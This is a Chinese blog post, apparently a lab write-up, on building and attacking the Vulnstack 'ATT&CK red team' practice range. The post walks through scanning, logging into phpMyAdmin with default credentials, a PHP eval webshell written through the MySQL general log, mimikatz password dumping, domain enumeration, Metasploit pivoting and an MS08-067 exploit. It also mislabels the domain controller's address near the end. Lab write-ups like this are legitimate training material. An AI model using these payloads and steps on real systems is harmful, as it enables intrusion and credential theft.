ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程

*ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程*

目录

ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程

0x01前言

0x02环境搭建

0x03 WEB攻击

0x04 内网信息收集

*0x01**前言*

本靶机环境本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019,若登录失败,尝试Qwer1234。

*0x02**环境搭建*

Win7作为web服务器,连接外网。设置两块网卡,一块设置为NAT模式,模拟外网服务,一台设置为host模式,模拟内网环境。

Win7

外网IP:192.168.1.142

内网IP:192.168.52.143

开启内置的phpstudy,启动web服务。

Win server2003为域控,其域成员包括Win7,Win server2008。设置其地址为host模式,不出网,网段保持一致,设置为52段。

Win2003

内网IP:192.168.52.138

Win server 2008作为普通服务器,也设置为host模式。

Win2008内网IP:192.168.52.141

攻击机使用的为kali,和一台Win7物理机。网络模式设置为NAT即可。

测试一下是否能访问Win7服务。


)

如图成功访问。至此,环境搭建完毕,开始模拟攻击。

模拟攻击示意图如下:

*0x**03 WEB**攻击*

*3**.1**主机探测*

命令:netdiscover -i eth0 -r 192.168.1.0/24

发现192.168.1.142主机存活。

*3.**2**端口扫描*

命令:nmap -sC -v -n -sV -Pn -p 1-65535 192.168.1.142

发现80端口开启,访问192.168.1.142:80,发现大量信息泄露,收集有用信息。

*3**.3**目录扫描*

发现有Phpmyadmin和网站备份路径。这里只讲思路一。

*3.4**phpmyadmin利用*

进入页面,输入默认密码,root/root发现成功登入。

在SQL模块中插入sql语句

首先测试是否可以使用select into outfile直接写入

> Select '<?php eval($_POST[hack]);?> ' into outfile 'C:/phpStudy/WWW/hack.php'

写入失败, show global variables like ‘%secure%’查看变量secure-file-priv 值为NULL,且为只读无法修改。

尝试使用全局日志写入shell,查看全局变量general_log:show global variables like ‘%general_%

开启全局日志并修改日志保存位置为C:/phpStudy/WWW/111.php

set global general_log=on;

set global general_log_file='C:/phpStudy/WWW/111.php';

查询一句话写入日志Select ''

利用菜刀进行一句话木马连接

发现成功连接,已进入网站后台。

*3**.5* *上线cs* *getshell并提权到system权限。*

提权成功

进行域信息收集。

输入 shell ipconfig/all

域名为god

内网ip为192.168.52.143

执行cs内置mimikaiz

跑出win7

明文密码 Qwer1234

可以远程连接桌面,至此Win7的控制权已拿下。

查看域信息

net group /domain  #查看域内所有用户列表

net group “domain computers” /domain #查看域成员计算机列表

net group “domain admins” /domain #查看域管理员用户

本机计算机名字为STU1,另外还有两个域用户分别是DEV1、ROOT-TVI862UBEH、域控制用户为OWA

*0x**04* *内网信息收集*

前面收集到的信息Win7计算机名字为STU1,另外还有两个域用户分别是DEV1、ROOT-TVI862UBEH、域控制用户为OWA

win7内网的IP地址为192.168.52.143

进一步开始收集,通过Ladon 192.168.52.0/24 OnlinePC探测域内存活主机

域成员:192.168.52.141

域控DC:192.168.52.138

*4**.1**proxychain内网穿透*

利用kali的msf模块创建一个shell 上传到 win7上,建立连接。

添加路由

\1. run autoroute -s 192.168.52.0/24		添加路由

\2. run autorout -p    查看是否添加成功 

\3. background      返回

\4. route print			输出路由

\5. use auxiliary/server/socks4a		使用 socks4a模块

\6. set srvport 1080		设置端口1080

\7. run		运行

使用namp发现可以连接目标内网主机,进行漏洞探测。

发现漏洞ms08-067,进入漏洞模块进行利用

成功返回shell,至此,域控 192.168.52.141已被拿下。

还有其他思路可以自己尝试。

posted @ 2023-05-12 14:00  fugodd  阅读(191)  评论(0编辑  收藏  举报